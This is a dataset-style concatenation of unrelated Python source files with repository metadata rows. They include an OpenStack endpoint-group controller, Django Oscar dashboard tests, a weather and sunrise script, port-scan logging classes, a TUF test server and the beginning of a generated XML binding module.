ref = self._assign_unique_id(self._normalize_dict(endpoint_group))
self._require_attribute(ref, 'filters')
self._require_valid_filter(ref)
ref = self.endpoint_filter_api.create_endpoint_group(ref['id'], ref)
return EndpointGroupV3Controller.wrap_member(context, ref)
def _require_valid_filter(self, endpoint_group):
filters = endpoint_group.get('filters')
for key in six.iterkeys(filters):
if key not in self.VALID_FILTER_KEYS:
raise exception.ValidationError(
attribute=self._valid_filter_keys(),
target='endpoint_group')
def _valid_filter_keys(self):
return ' or '.join(self.VALID_FILTER_KEYS)
@controller.protected()
def get_endpoint_group(self, context, endpoint_group_id):
"""Retrieve the endpoint group associated with the id if exists."""
ref = self.endpoint_filter_api.get_endpoint_group(endpoint_group_id)
return EndpointGroupV3Controller.wrap_member(
context, ref)
@controller.protected()
def update_endpoint_group(self, context, endpoint_group_id,
endpoint_group):
"""Update fixed values and/or extend the filters."""
ref = self.endpoint_filter_api.update_endpoint_group(endpoint_group_id,
endpoint_group)
self._require_valid_filter(ref)
return EndpointGroupV3Controller.wrap_member(
context, ref)
@controller.protected()
def delete_endpoint_group(self, context, endpoint_group_id):
"""Delete endpoint_group."""
self.endpoint_filter_api.delete_endpoint_group(endpoint_group_id)
@controller.protected()
def list_endpoint_groups(self, context):
"""List all endpoint groups."""
refs = self.endpoint_filter_api.list_endpoint_groups()
return EndpointGroupV3Controller.wrap_collection(
context, refs)
@controller.protected()
def list_endpoint_groups_for_project(self, context, project_id):
"""List all endpoint groups associated with a given project."""
return EndpointGroupV3Controller.wrap_collection(
context, self._get_endpoint_groups_for_project(project_id))
@controller.protected()
def list_projects_associated_with_endpoint_group(self,
context,
endpoint_group_id):
"""List all projects associated with endpoint group."""
endpoint_group_refs = (self.endpoint_filter_api.
list_projects_associated_with_endpoint_group(
endpoint_group_id))
projects = []
for endpoint_group_ref in endpoint_group_refs:
project = self.assignment_api.get_project(
endpoint_group_ref.project_id)
if project:
projects.append(project)
return assignment.controllers.ProjectV3.wrap_collection(context,
projects)
@controller.protected()
def list_endpoints_associated_with_endpoint_group(self,
context,
endpoint_group_id):
"""List all the endpoints filtered by a specific endpoint group."""
filtered_endpoints = self._get_endpoints_filtered_by_endpoint_group(
endpoint_group_id)
return catalog_controllers.EndpointV3.wrap_collection(
context, filtered_endpoints)
class ProjectEndpointGroupV3Controller(_ControllerBase):
collection_name = 'project_endpoint_groups'
member_name = 'project_endpoint_group'
def __init__(self):
super(ProjectEndpointGroupV3Controller, self).__init__()
notifications.register_event_callback(
notifications.ACTIONS.deleted, 'project',
self._on_project_delete)
def _on_project_delete(self, service, resource_type,
operation, payload):
project_id = payload['resource_info']
(self.endpoint_filter_api.
delete_endpoint_group_association_by_project(
project_id))
@controller.protected()
def get_endpoint_group_in_project(self, context, endpoint_group_id,
project_id):
"""Retrieve the endpoint group associated with the id if exists."""
self.assignment_api.get_project(project_id)
self.endpoint_filter_api.get_endpoint_group(endpoint_group_id)
ref = self.endpoint_filter_api.get_endpoint_group_in_project(
endpoint_group_id, project_id)
return ProjectEndpointGroupV3Controller.wrap_member(
context, ref)
@controller.protected()
def add_endpoint_group_to_project(self, context, endpoint_group_id,
project_id):
"""Creates an association between an endpoint group and project."""
self.assignment_api.get_project(project_id)
self.endpoint_filter_api.get_endpoint_group(endpoint_group_id)
self.endpoint_filter_api.add_endpoint_group_to_project(
endpoint_group_id, project_id)
@controller.protected()
def remove_endpoint_group_from_project(self, context, endpoint_group_id,
project_id):
"""Remove the endpoint group from associated project."""
self.assignment_api.get_project(project_id)
self.endpoint_filter_api.get_endpoint_group(endpoint_group_id)
self.endpoint_filter_api.remove_endpoint_group_from_project(
endpoint_group_id, project_id)
@classmethod
def _add_self_referential_link(cls, context, ref):
url = ('/OS-EP-FILTER/endpoint_groups/%(endpoint_group_id)s'
'/projects/%(project_id)s' % {
'endpoint_group_id': ref['endpoint_group_id'],
'project_id': ref['project_id']})
ref.setdefault('links', {})
ref['links']['self'] = url
| 44.343066 | 79 | 0.663621 |
0beaf59351d959dba0e445eaf87e7ecc7e0ddd4d | 479 | py | Python | python-for-beginners/06 - Dates/date_functions.py | vijayraavi/c9-python-getting-started | 345c81fb210601836d3618ff7bd491256ae62fa9 | [
"MIT"
] | 8,041 | 2019-09-17T17:25:51.000Z | 2022-03-31T11:38:07.000Z | python-for-beginners/06 - Dates/date_functions.py | magicsolmyr/c9-python-getting-started | a74d0ea8451a9709dcebbb29ae931a9cb82fc695 | [
"MIT"
] | 43 | 2019-09-20T15:47:26.000Z | 2022-01-23T20:33:28.000Z | python-for-beginners/06 - Dates/date_functions.py | magicsolmyr/c9-python-getting-started | a74d0ea8451a9709dcebbb29ae931a9cb82fc695 | [
"MIT"
] | 2,377 | 2019-09-17T18:16:53.000Z | 2022-03-30T15:38:07.000Z | #To get current date and time we need to use the datetime library
from datetime import datetime, timedelta
# The now function returns current date and time
today = datetime.now()
print('Today is: ' + str(today))
#You can use timedelta to add or remove days, or weeks to a date
one_day = timedelta(days=1)
yesterday = today - one_day
print('Yesterday was: ' + str(yesterday))
one_week = timedelta(weeks=1)
last_week = today - one_week
print('Last week was: ' + str(last_week))
| 29.9375 | 65 | 0.741127 |
a96fbc40b29ee1cde0855c7fcb2fbe1e020858f7 | 5,632 | py | Python | tests/functional/dashboard/test_review.py | DGathagu/django-oscar | ccb14ce719359cfebe24e9383afcbd54a8ca6371 | [
"BSD-3-Clause"
] | 1 | 2020-09-23T10:40:22.000Z | 2020-09-23T10:40:22.000Z | tests/functional/dashboard/test_review.py | igithub2019/django-oscar | 2429ad9e88e9a432dfa60aaca703d99860f85389 | [
"BSD-3-Clause"
] | 9 | 2020-08-11T15:19:55.000Z | 2022-03-12T00:11:12.000Z | tests/functional/dashboard/test_review.py | igithub2019/django-oscar | 2429ad9e88e9a432dfa60aaca703d99860f85389 | [
"BSD-3-Clause"
] | null | null | null | from datetime import timedelta
from django.urls import reverse
from django.utils import timezone
from oscar.core.compat import get_user_model
from oscar.core.loading import get_model
from oscar.test.factories import ProductReviewFactory, UserFactory
from oscar.test.testcases import WebTestCase
ProductReview = get_model('reviews', 'productreview')
User = get_user_model()
class ReviewsDashboardTests(WebTestCase):
is_staff = True
def test_reviews_dashboard_is_accessible_to_staff(self):
url = reverse('dashboard:reviews-list')
response = self.get(url)
self.assertIsOk(response)
def test_bulk_editing_review_status(self):
user1 = UserFactory()
user2 = UserFactory()
ProductReviewFactory(pk=1, user=user1, status=0)
ProductReviewFactory(pk=2, user=user2, status=0)
ProductReviewFactory(pk=3, user=user2, status=0)
assert(ProductReview.objects.count() == 3)
list_page = self.get(reverse('dashboard:reviews-list'))
form = list_page.forms[1]
form['selected_review'] = [3, 2]
form.submit('update')
self.assertEqual(ProductReview.objects.get(pk=1).status, 0)
self.assertEqual(ProductReview.objects.get(pk=2).status, 1)
self.assertEqual(ProductReview.objects.get(pk=3).status, 1)
def test_filter_reviews_by_name(self):
user1 = UserFactory(first_name='Peter', last_name='Griffin')
user2 = UserFactory(first_name='Lois', last_name='Griffin')
ProductReviewFactory(user=user1, status=0)
ProductReviewFactory(user=user2, status=0)
ProductReviewFactory(user=user2, status=0)
url = reverse('dashboard:reviews-list') + '?name=peter'
response = self.get(url)
self.assertEqual(len(response.context['review_list']), 1)
self.assertEqual(response.context['review_list'][0].user, user1)
url = reverse('dashboard:reviews-list') + '?name=lois+griffin'
response = self.get(url)
self.assertEqual(len(response.context['review_list']), 2)
for review in response.context['review_list']:
self.assertEqual(review.user, user2)
def test_filter_reviews_by_keyword(self):
url = reverse('dashboard:reviews-list')
user1 = UserFactory()
user2 = UserFactory()
review1 = ProductReviewFactory(user=user1, title='Sexy Review')
review2 = ProductReviewFactory(
user=user2, title='Anry Review', body='argh')
ProductReviewFactory(user=user2, title='Lovely Thing')
response = self.get(url, params={'keyword': 'argh'})
self.assertEqual(len(response.context['review_list']), 1)
self.assertEqual(response.context['review_list'][0], review2)
response = self.get(url, params={'keyword': 'review'})
self.assertQuerysetContains(response.context['review_list'],
[review1, review2])
def assertQuerysetContains(self, qs, items):
qs_ids = [obj.id for obj in qs]
item_ids = [item.id for item in items]
self.assertEqual(len(qs_ids), len(item_ids))
for i, j in zip(qs_ids, item_ids):
self.assertEqual(i, j)
def test_filter_reviews_by_date(self):
def n_days_ago(days):
"""
The tests below pass timestamps as GET parameters, but the
ProductReviewSearchForm doesn't recognize the timezone notation.
"""
return timezone.make_naive(
now - timedelta(days=days), timezone=timezone.utc)
now = timezone.now()
review1 = ProductReviewFactory()
review2 = ProductReviewFactory()
review2.date_created = now - timedelta(days=2)
review2.save()
review3 = ProductReviewFactory()
review3.date_created = now - timedelta(days=10)
review3.save()
url = reverse('dashboard:reviews-list')
response = self.get(url, params={'date_from': n_days_ago(5)})
self.assertQuerysetContains(response.context['review_list'],
[review1, review2])
response = self.get(url, params={'date_to': n_days_ago(5)})
self.assertQuerysetContains(response.context['review_list'],
[review3])
response = self.get(url, params={
'date_from': n_days_ago(12),
'date_to': n_days_ago(9),
})
self.assertQuerysetContains(response.context['review_list'],
[review3])
def test_filter_reviews_by_status(self):
url = reverse('dashboard:reviews-list')
user1 = UserFactory()
user2 = UserFactory()
review1 = ProductReviewFactory(user=user1, status=1)
review2 = ProductReviewFactory(user=user2, status=0)
review3 = ProductReviewFactory(user=user2, status=2)
response = self.get(url, params={'status': 0})
self.assertEqual(len(response.context['review_list']), 1)
self.assertEqual(response.context['review_list'][0], review2)
response = self.get(url, params={'status': 1})
self.assertEqual(len(response.context['review_list']), 1)
self.assertEqual(response.context['review_list'][0], review1)
response = self.get(url, params={'status': 2})
self.assertEqual(len(response.context['review_list']), 1)
self.assertEqual(response.context['review_list'][0], review3)
response = self.get(url, params={'status': 3})
reviews = response.context['review_list']
self.assertTrue(review1 in reviews)
| 38.054054 | 76 | 0.643821 |
199e67012fc223fd222fb63cb605aa37bf38ed7a | 1,887 | py | Python | SunRSunS.py | PARVASHWANI/Weather-Sunrise-Sunset-Forcaster | 1b7954c72c94cd3e51fc990decbcd1ba557a0c85 | [
"MIT"
] | null | null | null | SunRSunS.py | PARVASHWANI/Weather-Sunrise-Sunset-Forcaster | 1b7954c72c94cd3e51fc990decbcd1ba557a0c85 | [
"MIT"
] | null | null | null | SunRSunS.py | PARVASHWANI/Weather-Sunrise-Sunset-Forcaster | 1b7954c72c94cd3e51fc990decbcd1ba557a0c85 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding: utf-8
# In[33]:
import requests, json
#OPEN WEATHER MAP API
api_keyW = "Enter Your Own API From"
base_urlW = "http://api.openweathermap.org/data/2.5/weather?units=metric&cnt=7&lang=en&"
city_name = input("Enter City Name: ")
complete_urlw = base_urlW+ "appid=" + api_keyW + "&q=" + city_name
# In[34]:
complete_urlw
# In[35]:
responsew = requests.get(complete_urlw)
# In[36]:
y = responsew.json()
# In[37]:
z = y['main']
cur_temp = z["temp"]
cur_pres = z["pressure"]
cur_humi = z["humidity"]
min_temp = z["temp_min"]
max_temp = z["temp_max"]
visibili = ["visibility"]
w = y["wind"]
wind_speed = w["speed"]
wind_deg = w["deg"]
# In[38]:
longi = y['coord']['lon']
latti = y['coord']['lat']
# In[39]:
###create base_url(isme paremeter nahi hote hai)
#phir jitne bhee parameter chahie utne paremeter bana lijye
base_url = "https://api.sunrise-sunset.org/json"
latitude = str(latti)
longitude = str(longi)
complete_url = base_url + '?lat=' + latitude + '&lng=' + longitude
# In[40]:
#https://api.sunrise-sunset.org/json?lat=36.7201600&lng=-4.4203400
complete_url
# In[41]:
#Response banana hai
#respose module me 'get' naam ka methord hota hai jista argument complete URL hota
response = requests.get(complete_url)
# In[42]:
x = response.json()
# In[43]:
sunset = x['results']['sunset']
# In[44]:
sunrise = x['results']['sunrise']
# In[45]:
print(" Current Temprature(In Celsius unit) = " + str(cur_temp) +
"\n Atmospheric Pressure (in hPa unit) = " + str(cur_pres) +
"\n Humidity (in percentage) = " + str(cur_humi) +
"\n Minimum Temprature = " + str(min_temp) +
"\n Maximum Temprature = " + str(max_temp) +
"\n Wind Speed =" + str(wind_speed) +
"\n Degree = " + str(wind_deg) +
"\n Sunrise (in UTC) = " + str(sunrise) +
"\n Sunset (in UTC) = " + str(sunset))
| 17.154545 | 88 | 0.63487 |
40fc7f28594c34e6d6432a51c5b9165268bd7b37 | 2,557 | py | Python | entry.py | pythonhacker/pyscanlogd | 64d6ad38127243e5c422be7f899ecfa802e1ad21 | [
"BSD-3-Clause"
] | 1 | 2021-04-03T22:15:06.000Z | 2021-04-03T22:15:06.000Z | entry.py | pythonhacker/pyscanlogd | 64d6ad38127243e5c422be7f899ecfa802e1ad21 | [
"BSD-3-Clause"
] | null | null | null | entry.py | pythonhacker/pyscanlogd | 64d6ad38127243e5c422be7f899ecfa802e1ad21 | [
"BSD-3-Clause"
] | 2 | 2020-12-18T20:06:21.000Z | 2021-04-08T02:47:40.000Z | # -- coding: utf-8
class ScanEntry(object):
""" Port scan entry """
def __init__(self, hash):
self.src = 0
self.dst = 0
self.zombie = 0
self.timestamp = 0
self.timediffs = []
# Average of time-stamps
self.time_avg = 0.0
# Standard deviation in time-stamps
self.time_sd = 0.0
self.logged = False
self.type = ''
self.flags_or = 0
# SCTP
self.chunk_type = 0
self.weight = 0
self.ports = []
self.proto = 0
self.next = None
self.hash = hash
def update_time_sd(self):
""" Update standard deviation of time differences """
num = float(len(self.timediffs))
if num>0:
mean = 1.0*sum(self.timediffs)/num
sd = pow(sum([pow((x - mean), 2) for x in self.timediffs])/num, 0.5)
self.time_sd = sd
self.time_avg = mean
class EntryLog(dict):
""" Modified dictionary class with fixed size, which
automatically removes oldest items, for storing port
scan entry logs """
# This will work only if the value is an object storing
# its key in the 'hash' attribute and links to other
# objects usin the 'next' attribute.
def __init__(self, maxsz):
self.oldest = None
self.last = None
self.maxsz = maxsz
super(EntryLog, self).__init__()
def __setitem__(self, key, value):
if not self.__contains__(key) and len(self)==self.maxsz:
# Remove oldest
if self.oldest:
self.__delitem__(self.oldest.hash)
self.oldest = self.oldest.next
super(EntryLog, self).__setitem__(key,value)
if self.last:
self.last.next = value
self.last = value
else:
self.last = value
self.oldest = self.last
class RecentScanEntry(object):
""" Recent scan entry class, storing
most recent scan entries """
def __init__(self, scan, is_scan=True):
self.src = scan.src
self.dst = scan.dst
self.zombie = scan.zombie
self.type = scan.type
self.flags_or = scan.flags_or
self.ports = scan.ports[:]
self.timestamp = scan.timestamp
self.is_scan = is_scan
def __eq__(self, entry):
return ((self.src==entry.src) and (self.dst==entry.dst) and \
(self.type==entry.type))
| 29.732558 | 81 | 0.541259 |
53b3b931c2ef5c69e9c3b0d698c46d504330cf25 | 1,411 | py | Python | ElexonDataPortal/rebuild.py | r4ch45/ElexonDataPortal | d44ed4da33278c0135ff95fb126a10d9384af22f | [
"MIT"
] | 22 | 2021-01-12T12:34:43.000Z | 2022-03-30T06:18:40.000Z | ElexonDataPortal/rebuild.py | r4ch45/ElexonDataPortal | d44ed4da33278c0135ff95fb126a10d9384af22f | [
"MIT"
] | 12 | 2021-02-26T16:17:58.000Z | 2022-03-29T19:32:29.000Z | ElexonDataPortal/rebuild.py | r4ch45/ElexonDataPortal | d44ed4da33278c0135ff95fb126a10d9384af22f | [
"MIT"
] | 6 | 2021-06-07T11:58:35.000Z | 2022-03-30T06:18:42.000Z | # AUTOGENERATED! DO NOT EDIT! File to edit: nbs/07-cli-rebuild.ipynb (unless otherwise specified).
__all__ = ['app', 'rebuild_library']
# Cell
import typer
import shutil
import pandas as pd
from fastcore.foundation import Config
from .dev import nbdev, specgen, rawgen, clientgen
# Cell
app = typer.Typer()
# Cell
@app.command()
def rebuild_library():
lib_path = str(Config().path('lib_path'))
dir_root = f'{lib_path}/..'
endpoints_fp = f'{dir_root}/data/endpoints.csv'
shutil.rmtree(lib_path)
nbdev.prepare_nbdev_module()
nbdev.notebook2script()
df_endpoints = specgen.load_endpoints_df(endpoints_fp)
API_spec = specgen.construct_spec(df_endpoints)
specgen.save_spec(
API_spec,
in_fp=f'{dir_root}/templates/open_api_spec.yaml',
out_fp=f'{dir_root}/data/BMRS_API.yaml'
)
rawgen.save_methods(
functions=rawgen.construct_all_functions(specgen.load_API_yaml(fp=f'{dir_root}/data/BMRS_API.yaml')),
in_fp=f'{dir_root}/templates/raw_methods.py',
out_fp=f'{dir_root}/ElexonDataPortal/dev/raw.py'
)
clientgen.save_api_client(
API_yaml_fp=f'{dir_root}/data/BMRS_API.yaml',
in_fp=f'{dir_root}/templates/api.py',
out_fp=f'{dir_root}/ElexonDataPortal/api.py'
)
nbdev.add_extra_code_desc_to_mod()
return
# Cell
if __name__ == '__main__' and '__file__' in globals():
app() | 26.12963 | 109 | 0.696669 |
4a4ae5f2fb5ae97276348505e4c71cb27e6c5f39 | 1,211 | py | Python | dist/vengeance-1.0.3.tar/dist/vengeance-1.0.3/vengeance/excel_com/excel_constants.py | michael-ross-ven/vengeance | 53c6eefba0573936d22a55ba5900744ac701f4b9 | [
"MIT"
] | 1 | 2020-01-18T18:23:26.000Z | 2020-01-18T18:23:26.000Z | dist/vengeance-1.0.3.tar/dist/vengeance-1.0.3/vengeance/excel_com/excel_constants.py | michael-ross-ven/vengeance | 53c6eefba0573936d22a55ba5900744ac701f4b9 | [
"MIT"
] | null | null | null | dist/vengeance-1.0.3.tar/dist/vengeance-1.0.3/vengeance/excel_com/excel_constants.py | michael-ross-ven/vengeance | 53c6eefba0573936d22a55ba5900744ac701f4b9 | [
"MIT"
] | null | null | null |
# excel-specific constants
# (explicitly encoded as ascii instead of utf to avoid issues w/ C++ safearray strings)
xl_class_name = 'XLMAIN'.encode('ascii')
xl_desk_class = 'XLDESK'.encode('ascii')
xl_excel7_class = 'EXCEL7'.encode('ascii')
# HKEY_CLASSES_ROOT\Excel.Application: excel's clsid
xl_clsid = '{00020400-0000-0000-C000-000000000046}'
excel_errors = {-2146826281: 'error div0',
-2146826246: 'error na',
-2146826259: 'error name',
-2146826288: 'error null',
-2146826252: 'error num',
-2146826265: 'error ref',
-2146826273: 'error value',
0x800A07FA: 'error div0'}
# colors
xl_yellow = 13434879
xl_clear = -4142
# find parameters
xl_values = -4163
xl_cell_type_formulas = -4123
xl_errors = 16
xl_whole = 1
xl_part = 2
xl_next = 1
xl_previous = 2
xl_by_rows = 1
xl_by_columns = 2
xl_up = -4162
xl_to_right = -4161
# enums
xl_paste_column_widths = 8
xl_range_ms_xml = 12
xl_range_value_ms_persist_xml = 12
# external / windows / shell constants
xl_maximized = -4137
sw_show = 1
native_om = -16
vb_ok_only = 0
process_terminate = 1
| 24.714286 | 87 | 0.64327 |
17324f2d45e4f3fca2f949bcb117ee2780cb3cfc | 208 | py | Python | example/sample6.py | sano-jin/go-in-ocaml | b5e5fca33e194776477a0db389f6e52bdc0a66fe | [
"MIT"
] | 1 | 2021-09-24T10:25:40.000Z | 2021-09-24T10:25:40.000Z | example/sample6.py | sano-jin/go-in-ocaml | b5e5fca33e194776477a0db389f6e52bdc0a66fe | [
"MIT"
] | null | null | null | example/sample6.py | sano-jin/go-in-ocaml | b5e5fca33e194776477a0db389f6e52bdc0a66fe | [
"MIT"
] | null | null | null | y = 0
def hoge (y):
def hige ():
print(y)
y = 1
def fuga ():
nonlocal y
y = y + 2
print(y)
return hige
return fuga
h = hoge(3)
h()
h()()
h()()
print(y)
| 12.235294 | 19 | 0.408654 |
6206d9993053bd1057addb1ced2a2a2ed9efcf40 | 2,235 | py | Python | actions/latest_release.py | kingsleyadam/stackstorm-github | 611c318cd294a58a7e8b1f20161c5404e41efaf0 | [
"Apache-2.0"
] | 164 | 2015-01-17T16:08:33.000Z | 2021-08-03T02:34:07.000Z | actions/latest_release.py | kingsleyadam/stackstorm-github | 611c318cd294a58a7e8b1f20161c5404e41efaf0 | [
"Apache-2.0"
] | 442 | 2015-01-01T11:19:01.000Z | 2017-09-06T23:26:17.000Z | actions/latest_release.py | kingsleyadam/stackstorm-github | 611c318cd294a58a7e8b1f20161c5404e41efaf0 | [
"Apache-2.0"
] | 202 | 2015-01-13T00:37:40.000Z | 2020-11-07T11:30:10.000Z | # Licensed to the StackStorm, Inc ('StackStorm') under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
import time
import datetime
from lib.base import BaseGithubAction
class LatestReleaseAction(BaseGithubAction):
def run(self, api_user, repository, github_type):
enterprise = self._is_enterprise(github_type)
if api_user:
self.token = self._get_user_token(api_user, enterprise)
release = self._request("GET",
"/repos/{}/releases/latest".format(repository),
None,
token=self.token,
enterprise=enterprise)
ts_published_at = time.mktime(
datetime.datetime.strptime(
release['published_at'],
"%Y-%m-%dT%H:%M:%SZ").timetuple())
results = {'author': release['author']['login'],
'avatar_url': release['author']['avatar_url'],
'html_url': release['html_url'],
'tag_name': release['tag_name'],
'target_commitish': release['target_commitish'],
'name': release['name'],
'body': release['body'],
'draft': release['draft'],
'prerelease': release['prerelease'],
'created_at': release['created_at'],
'published_at': release['published_at'],
'ts_published_at': ts_published_at,
'total_assets': len(release['assets'])}
return results
| 40.636364 | 79 | 0.599553 |
74e84f0d80fc8aa1aa0dba8d39bc3a0a187c3289 | 1,784 | py | Python | tests/simple_server.py | omerlh/tuf | f496c83e78b05c2f50a0bd5dde197782a839177b | [
"Apache-2.0",
"MIT"
] | 1,324 | 2015-01-08T23:18:59.000Z | 2021-09-02T07:51:27.000Z | tests/simple_server.py | omerlh/tuf | f496c83e78b05c2f50a0bd5dde197782a839177b | [
"Apache-2.0",
"MIT"
] | 988 | 2015-01-02T14:21:06.000Z | 2021-09-02T08:55:29.000Z | tests/simple_server.py | menendezjaume/tuf | 41f7e809fef4cfe578cd2bd96f497da74b1bce15 | [
"Apache-2.0",
"MIT"
] | 221 | 2015-01-02T13:30:29.000Z | 2021-08-29T14:26:17.000Z | #!/usr/bin/env python
# Copyright 2012 - 2017, New York University and the TUF contributors
# SPDX-License-Identifier: MIT OR Apache-2.0
"""
<Program>
simple_server.py
<Author>
Konstantin Andrianov.
<Started>
February 15, 2012.
<Copyright>
See LICENSE-MIT or LICENSE for licensing information.
<Purpose>
This is a basic server that was designed to be used in conjunction with
test_download.py to test download.py module.
<Reference>
SimpleHTTPServer:
http://docs.python.org/library/simplehttpserver.html#module-SimpleHTTPServer
"""
import sys
import random
import socketserver
from http.server import SimpleHTTPRequestHandler
class QuietHTTPRequestHandler(SimpleHTTPRequestHandler):
"""A SimpleHTTPRequestHandler that does not write incoming requests to
stderr. """
def log_request(self, code='-', size='-'):
pass
# NOTE: On Windows/Python2 tests that use this simple_server.py in a
# subprocesses hang after a certain amount of requests (~68), if a PIPE is
# passed as Popen's stderr argument. This problem doesn't emerge if
# we silence the HTTP messages.
# If you decide to receive the HTTP messages, then this bug
# could reappear.
use_quiet_http_request_handler = True
if len(sys.argv) > 2:
use_quiet_http_request_handler = sys.argv[2]
if use_quiet_http_request_handler:
handler = QuietHTTPRequestHandler
else:
handler = SimpleHTTPRequestHandler
# Allow re-use so you can re-run tests as often as you want even if the
# tests re-use ports. Otherwise TCP TIME-WAIT prevents reuse for ~1 minute
socketserver.TCPServer.allow_reuse_address = True
httpd = socketserver.TCPServer(('localhost', 0), handler)
port_message = 'bind succeeded, server port is: ' \
+ str(httpd.server_address[1])
print(port_message)
httpd.serve_forever()
| 27.446154 | 80 | 0.767937 |
58cb32adcb2e2f51ff00fd7f0e8e579272f6325f | 566,397 | py | Python | pypwio/qes.py | zooks97/pypwio | 936542e214c2792d850c725f393c47f22aa98845 | [
"MIT"
] | null | null | null | pypwio/qes.py | zooks97/pypwio | 936542e214c2792d850c725f393c47f22aa98845 | [
"MIT"
] | null | null | null | pypwio/qes.py | zooks97/pypwio | 936542e214c2792d850c725f393c47f22aa98845 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated Tue Aug 28 11:14:42 2018 by generateDS.py version 2.29.24.
# Python 3.6.6 |Anaconda, Inc.| (default, Jun 28 2018, 17:14:51) [GCC 7.2.0]
#
# Command line options:
# ('-f', '')
# ('-o', 'qes-1.0.py')
#
# Command line arguments:
# qes-1.0.xsd
#
# Command line:
# /home/azadoks/.local/miniconda3/envs/dftman/bin/generateDS -f -o "qes-1.0.py" qes-1.0.xsd
#
# Current working directory (os.getcwd()):
# xml
#
import sys
import re as re_
import base64
import datetime as datetime_
import warnings as warnings_
try:
from lxml import etree as etree_
except ImportError:
from xml.etree import ElementTree as etree_
Validate_simpletypes_ = True
if sys.version_info.major == 2:
BaseStrType_ = basestring
else:
BaseStrType_ = str
def parsexml_(infile, parser=None, **kwargs):
if parser is None:
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
try:
parser = etree_.ETCompatXMLParser()
except AttributeError:
# fallback to xml.etree
parser = etree_.XMLParser()
doc = etree_.parse(infile, parser=parser, **kwargs)
return doc
def parsexmlstring_(instring, parser=None, **kwargs):
if parser is None:
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
try:
parser = etree_.ETCompatXMLParser()
except AttributeError:
# fallback to xml.etree
parser = etree_.XMLParser()
element = etree_.fromstring(instring, parser=parser, **kwargs)
return element
#
# Namespace prefix definition table (and other attributes, too)
#
# The module generatedsnamespaces, if it is importable, must contain
# a dictionary named GeneratedsNamespaceDefs. This Python dictionary
# should map element type names (strings) to XML schema namespace prefix
# definitions. The export method for any class for which there is
# a namespace prefix definition, will export that definition in the
# XML representation of that element. See the export method of
# any generated element type class for a example of the use of this
# table.
# A sample table is:
#
# # File: generatedsnamespaces.py
#
# GenerateDSNamespaceDefs = {
# "ElementtypeA": "http://www.xxx.com/namespaceA",
# "ElementtypeB": "http://www.xxx.com/namespaceB",
# }
#
try:
from generatedsnamespaces import GenerateDSNamespaceDefs as GenerateDSNamespaceDefs_
except ImportError:
GenerateDSNamespaceDefs_ = {}
#
# The root super-class for element type classes
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ImportError as exp:
class GeneratedsSuper(object):
tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')
class _FixedOffsetTZ(datetime_.tzinfo):
def __init__(self, offset, name):
self.__offset = datetime_.timedelta(minutes=offset)
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return None
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_validate_string(self, input_data, node=None, input_name=''):
if not input_data:
return ''
else:
return input_data
def gds_format_base64(self, input_data, input_name=''):
return base64.b64encode(input_data)
def gds_validate_base64(self, input_data, node=None, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_validate_integer(self, input_data, node=None, input_name=''):
return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_integer_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
int(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of integers')
return values
def gds_format_float(self, input_data, input_name=''):
return ('%.15f' % input_data).rstrip('0')
def gds_validate_float(self, input_data, node=None, input_name=''):
return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_float_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of floats')
return values
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_validate_double(self, input_data, node=None, input_name=''):
return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_double_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of doubles')
return values
def gds_format_boolean(self, input_data, input_name=''):
return ('%s' % input_data).lower()
def gds_validate_boolean(self, input_data, node=None, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_boolean_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(
node,
'Requires sequence of booleans '
'("true", "1", "false", "0")')
return values
def gds_validate_datetime(self, input_data, node=None, input_name=''):
return input_data
def gds_format_datetime(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d.%s' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
@classmethod
def gds_parse_datetime(cls, input_data):
tz = None
if input_data[-1] == 'Z':
